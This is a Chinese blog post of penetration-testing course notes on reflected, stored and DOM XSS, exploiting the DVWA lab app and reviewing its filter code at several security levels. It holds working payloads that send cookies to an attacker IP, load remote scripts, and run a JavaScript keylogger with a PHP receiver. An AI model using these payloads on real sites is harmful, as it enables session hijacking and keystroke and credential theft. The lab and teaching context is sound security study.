Kali Linux渗透测试 098 手动漏洞挖掘-XSS 漏洞

最新推荐文章于 2024-09-06 09:18:23 发布
最新推荐文章于 2024-09-06 09:18:23 发布
阅读量3.8k 收藏 20
点赞数 3
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79692621
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介
2. 反射型 XSS 漏洞
    2-1. 测试漏洞
    2-2. 常规攻击方法
    2-3. 键盘记录器
    2-4. dvwa 服务器源码
        2-4-1. Low 安全级别
        2-4-2. Medium 安全级别
        2-4-3. High 安全级别
3. 存储型 XSS 漏洞
    3-1. 验证漏洞
    3-2. 漏洞利用
    3-3. dvwa 服务器源码
        3-3-1. Low 安全级别
        3-3-2. Medium 安全级别
        3-3-3. High 安全级别
4. DOM型 XSS 漏洞
    4-1. 漏洞利用

1. 简介

  1. 简介

    • 与 Java 原因无关
    • 命名完全出于市场原因
    • 使用最广的客户端脚本语言

  2. 利用方法

    • 通过 WEB 站点漏洞,向客户端交付恶意执行代码,实现对客户端的攻击目的
    • 注入客户端脚本代码
    • 盗取 cookie
    • 重定向

  3. 使用场景

    - 直接嵌入html:<script> alert('XSS'); </script>
- 元素标签事件:<body onload=alert('XSS')>
- 图片标签:<img src="javascript:alert('XSS');">
- 其他标签:<iframe>, <div>, and <link>
- DOM对象,篡改页面内容

  4. 攻击参与方

    • 攻击者
    • 被攻击者
    • 漏洞站点
    • 第三方站点

  5. 漏洞形成的根源

    • 服务器对用户提交的数据过滤不严
    • 提交给服务器的脚本直接返回给其他客户端执行
    • 脚本咋客户端执行恶意操作

  6. XSS 漏洞类型

    • 存储型(持久性)
    • 反射性(非持久性)
    • DOM 型

  7. 漏洞判断方法

    • 提交数据之后,服务器原封不动的返回给客户端,就可以判断为存在 XSS 漏洞

1. 反射型 XSS 漏洞

1. 测试漏洞

  1. Poc

    - <script>alert(‘xss’)</script>
- <a href='' onclick=alert('xss')>type</a>
- <img src=http://1.1.1.1/a.ipg onerror=alert('xss')>
- <script>window.location='http://1.1.1.1'</script>
- <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe>
- <script>new Image().src="http://1.1.1.1/c.php?output="+document.cookie;</script>
- <script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>

  2. 在浏览器输入数字 AAAAA

    http://10.10.10.132/dvwa/vulnerabilities/xss_r/


    # 原封不动的返回给了客户端,说明存在 XSS 漏洞

  3. 使用 BurpSuite

  4. 测试漏洞,链接弹窗

    输入 <a href=https://www.baidu.com>click</a>
点击链接之后,发现已经跳转到其他页面


    点击 click


    BurpSuite

  5. 测试漏洞,点击弹窗

    输入 <script>alert('xss')</script>


  6. 测试漏洞,点击弹窗

    输入 <a href='' onclick=alert('xss')>type</a>


    将代码进行 encoder:%3c%61%20%68%72%65%66%3d%27%27%20%6f%6e%63%6c%69%63%6b%3d%61%6c%65%72%74%28%27%78%73%73%27%29%3e%74%79%70%65%3c%2f%61%3e



  7. 测试漏洞,错误弹窗

    输入 <img src=http://10.10.10.111/a.ipg onerror=alert('xss')>,错误弹窗

  8. 测试漏洞,重定向

    输入 <script>window.location='https://www.baidu.com'</script>


    在 kali 监听 80 端口,被攻击者的信息会被收集
root@kali:~# nc -nvlp 80
浏览器输入 <script>window.location='http://10.10.10.131'</script>

  9. 测试漏洞,框架

    在 kali 监听 80 端口,被攻击者的信息会被收集
输入 <iframe SRC="http://10.10.10.131/victim" height = "0" width ="0"></iframe>

  10. 测试漏洞,提取 cookie 信息

    输入 <script>new Image().src="http://10.10.10.131/c.php?output="+document.cookie;</script>

  11. 测试漏洞,篡改页面

    输入 <script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>

2. 常规攻击方法

  1. 重定向到其他的地方(肉鸡)读取脚本文件

    在 kali 本机设置 a.js



    kali 使用 nc 侦听 88 端口
输入 <script src="http://10.10.10.131/a.js"></script>

3. 键盘记录器

  1. 键盘记录器脚本:Keylogger.js

    # Keylogger.js
document.onkeypress = function(evt) 
{
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode)
    if (key) 
    {
        var http = new XMLHttpRequest();
        var param = encodeURI(key)
        http.open("POST","http://10.10.10.131/keylogger.php",true); # keylogger.php:接收键盘记录器信息的脚本
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}

  2. 接收键盘记录器信息的脚本:keylogger.php

    <?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>

  3. 接收的客户端的数据存放在文件:keylog.txt

  4. 访问服务器,提交代码

    输入 <script src="http://10.10.10.131/Keylogger.js"></script>

  5. 被攻击者的机器被获取键盘记录

    被攻击者在此网页再输入任何数据时,都会被记录


4. dvwa 服务器源码

1. Low 安全级别

 <?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
 $isempty = true;
} else {

 echo '<pre>';
 echo 'Hello ' . $_GET['name'];
 echo '</pre>';

}
?>

2. Medium 安全级别

  1. 源码

     <?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
 $isempty = true;
} else {
 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']);
 echo '</pre>'; 
}
?>

  2. 攻击

    # 代码中发现是 str_replace('<script>', '', $_GET['name'])
输入多层<script>
<scrip<script>t>alert('xss')</script>

3. High 安全级别

  1. 源码

     <?php
if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
 $isempty = true;  
} else {
 echo '<pre>';
 echo 'Hello ' . htmlspecialchars($_GET['name']);
 echo '</pre>'; 
}
?>

  2. 分析

    #  htmlspecialchars($_GET['name']) 是将 "<" 和 ">" 分别编码为 "&lt;" 和 "&gt;"
# 可以将攻击代码写在网页本身的"<"、">"之间,攻击代码自身不含有"<"、">",这样就不会被 htmlspecialchars() 过滤。
# 比如:<a href='' onclick=alert('xss')>type</a>
# dvwa 中的返回代码中不存在本身自带的"<"、">",,所以无法验证。

2. 存储型 XSS 漏洞

1. 验证漏洞

  1. 验证漏洞,原封不动的显示了输入的信息


  2. 查看第一栏是否会过滤脚本

    输入 <script>alert('xss')</script>



  3. 每次点击这个点解时,都会弹框

  4. 查看第二栏是否会过滤脚本

    输入 <script>alert('xssed')</script>



  5. 每次点击这个点解时,都会两次弹框


2. 漏洞利用

  1. 创建 a.js

    # kali IP
root@kali:/var/www/html# cat a.js 
var img = new Image();
img.src = "http://10.10.10.131:88/cookies.php?cookie="+document.cookie;


    # kali 使用 nc 监听

  2. 进行攻击

    输入 <script src=http://10.10.10.131/a.js></script>
发现无法成功输入,原因是浏览器进行了宽度限制,可以在本地修改

修改浏览器本地宽度


    重新输入 <script src=http://10.10.10.131/a.js></script>


3. dvwa 服务器源码

1. Low 安全级别

 <?php
if(isset($_POST['btnSign']))
{
   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);

   // Sanitize message input
   $message = stripslashes($message);
   $message = mysql_real_escape_string($message);

   // Sanitize name input
   $name = mysql_real_escape_string($name);

   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>

2. Medium 安全级别

 <?php
if(isset($_POST['btnSign']))
{
   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);

   // Sanitize message input
   $message = trim(strip_tags(addslashes($message)));
   $message = mysql_real_escape_string($message);
   $message = htmlspecialchars($message);

   // Sanitize name input
   $name = str_replace('<script>', '', $name);
   $name = mysql_real_escape_string($name);

   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?> 


# 分析 BurpSuite 可知,响应文件中的 name 只过滤了 <script>,未过滤 </script>,所以可以判断是指过滤了 <script>,可以使用 嵌套<script>
# 输入 <script>alert('xss')</script>

3. High 安全级别

 <?php
if(isset($_POST['btnSign']))
{
   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);

   // Sanitize message input
   $message = stripslashes($message);
   $message = mysql_real_escape_string($message);
   $message = htmlspecialchars($message);

   // Sanitize name input
   $name = stripslashes($name);
   $name = mysql_real_escape_string($name); 
   $name = htmlspecialchars($name);

   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>

3. DOM型 XSS 漏洞

1. 漏洞利用

  • DOM : 一套 JS 和其他语言可调用的标准的 API

    root@kali:~# nc -nvlp 88
反射型,输入 <script>var img=document.createElement("img");img.src="http://10.10.10.131:88/log?"+escape(document.cookie);</script>
网络安全打工人
关注
专栏目录
漏洞挖掘】——83、API接口安全问题刨析
Fly_鹏程万里
06-12 152
在HW期间的目标信息收集阶段,我们时而会遇到WSDL(Web Services Description Language)的XML格式文件,其定义了Web服务的接口、操作、消息格式和协议细节,在WSDL文件中很多时候都会指定服务的端口类型(Port Type)和绑定(Binding),绑定定义了如何使用 SOAP协议进行通信以及消息的格式和传输细节,而这很多时候会被对此不是很了解的红队队员会直接进行忽略,而部分对此有了解红队的会对接口进行Fuzzingc测试,试图找寻诸如命令执行、SQL诸如等漏洞,力争获取
渗透测试--xss
酷狗直播-锦凡歆的博客
12-22 746
作者: 锦凡歆在‘来疯’直播唱歌最好听 跨站脚本攻击 XSS 漏洞概述 - 简介 XSS 作为OWASP TOP 10 之一, XSS 被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascrip...
xss简单渗透测试
weixin_30244889的博客
02-14 205
xss简单渗透测试 xss简单渗透测试 Write by admin in未分类at 2009-07-27 11:13:24 xss简单渗透测试 Author: jianxin [80sec]EMail: jianxin#80sec.comSite: http://www.80sec.comDate: 2008-12-24From:http://w...
SRC漏洞挖掘经验+技巧篇,零基础入门到精通,收藏这篇就够了
最新发布
Python_paipai的博客
09-06 2158
在HP Data protecetor Media Operations 的客户端连接服务端时,通过私访有的通信协议,客户端会首先检查[系统分区]:\Documents and Settings\[用户名]\Application Data 下面是否有相应的资源(如插件等),如果没有,则会向服务器请求需要的文件,服务器没有验证请求的文件名的合法性,而且这个过程不需要任何验证,攻击者精心构造文件名,可以读取服务端安装目录所在分区的任意文件。最古老的内存破坏类型。漏洞造成的敏感信息泄露导致机密性的破坏;
xss渗透测试
weixin_34227447的博客
01-06 636
跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式,很多人对于xss的利用大多停留在弹框框的程度,一些厂商对xss也是不以为然,都认为安全级别很低...
XSS渗透测试
m0_51426816的博客
02-25 794
渗透测试基本原理:依据渗透策略生成攻击向量,提交给Web服务器,然后根据Web服务器返回的网页来判断相应的检测点是否存在XSS漏洞 一.渗透策略 渗透策略规定了向Web服务器提交的内容,并根据Web服务器的返回信息来决定下一步的提交方案 流程: 二.合法字符串测试 Web服务器对检测点所提交的内容做不同的处理,并返回不同的网页,根据对返回网页的分析,排除掉不可能存在XSS漏洞的检测点,从而提高检测效率 三.攻击向量测试 模拟浏览器提交表单的过程向检测点注入攻击向量。根据action、method、type
渗透测试-XSS
SK1ng的博客
10-03 2673
XSS 原理 XSS 即跨站脚本攻击(Cross Site Script),通过构造代码(JS)注入网页中,并由浏览器解释运行这段JS代码,以达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段浏览器代码,也就是用户被攻击了 微博、留言板、聊天室、订单等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 攻击的风险,只要没有对用户的输入进行严格的过滤,就会被XSS 攻击 危害 盗取各种用户账户 盗取用户Cookie资料,冒充用户身份进入网
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3260
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2420
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
渗透测试新手上路:Kali Linux实战技巧全解析
渗透测试Kali Linux简介 ## 1.1 渗透测试简介 渗透测试,也称为pentest,是信息安全领域中的一项技术性活动,旨在通过模拟黑客攻击的方式,识别潜在的安全风险和漏洞。该过程涉及对网络、系统或应用程序的安全...
XSS漏洞扫描 XSS漏洞扫描
07-08
XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描XSS漏洞扫描
渗透测试xss
weixin_45754647的博客
05-27 177
一、 二、xss分类 1、反射型xss,经常发生在搜索框 2、存储型xss,经常发生在留言板 3、 4、 5、 6、 7、
kali xss漏洞扫描工具使用教程
weixin_49071539的博客
11-19 2891
xss漏洞扫描教程 git clone https://github.com/hahwul/XSpear.git cd XSpear/ ls gem sudo gem install XSpear-1.4.1.gem (往后版本可能会更新,根据文件夹里的版本进行下载) XSpear -u “http://test.php.vulnweb.com/listproducts.php?cat=123” -v 1 注:https://bit.ly/35NOnDS 这是一个极易受攻击的安卓实验室!!! ...
渗透测试XSS
Zane·S的博客
04-29 720
XSS漏洞原理 XSS攻击可以分为三种:反射型、存储型和DOM型 反射型 XSS 反射型XSS又称非持久型XSS ,这种攻击往往具有一次性。 攻击方式:攻击者通过电子邮件等方式将包含 XSS 代码的恶意链接发送给目标用户; 当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器; 浏览器解析这段带有XSS代码的恶意脚本后,就会触发X...
渗透测试[xss脚本攻击]
npc88888的博客
03-07 1271
相反,攻击者利用前端JavaScript代码中的漏洞,直接在用户的浏览器中修改网页的DOM结构,导致恶意脚本被执行。举个例子,假设一个网页上有一个搜索框,用户在搜索框中输入内容后,网页会通过JavaScript代码将用户的输入显示在页面上。如果网页没有对用户输入进行适当的验证和转义处理,那么攻击者可以构造一个恶意输入,其中包含恶意脚本,比如。在网站是否存在 xss 漏洞时,应该输入一些标签如输入后查看网页源代码是 否过滤标签,如果没过滤,很大可能存在 xss 漏洞。登录后台,就会执行这个代码。
渗透测试-web安全】XSS注入
harry_c的博客
10-10 794
渗透测试-web安全】XSS注入基本分类存储型XSS反射型XSSDOM型XSS总结 基本分类 存储型XSS 反射型XSS DOM型XSS 存储型XSS 黑客在前端写入XSS到数据库–>用户进行web访问–>向服务器请求数据–>返回带XSS脚本的数据–>前端出发XSS 注意事项:一般通过将携带XSS的数据写入到数据库中,比如留言功能中构造对应的XSS,或者通过其他的形式写...
KaliLinux渗透测试教程:安装与常用工具详解
Kali Linux是一个专为渗透测试设计的Linux发行版,源于BackTrack Linux,它预装了大量渗透测试工具,如nmap、Wireshark、John the Ripper和Aircrack-ng,这些工具可用于信息收集、漏洞扫描、漏洞利用、权限提升和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值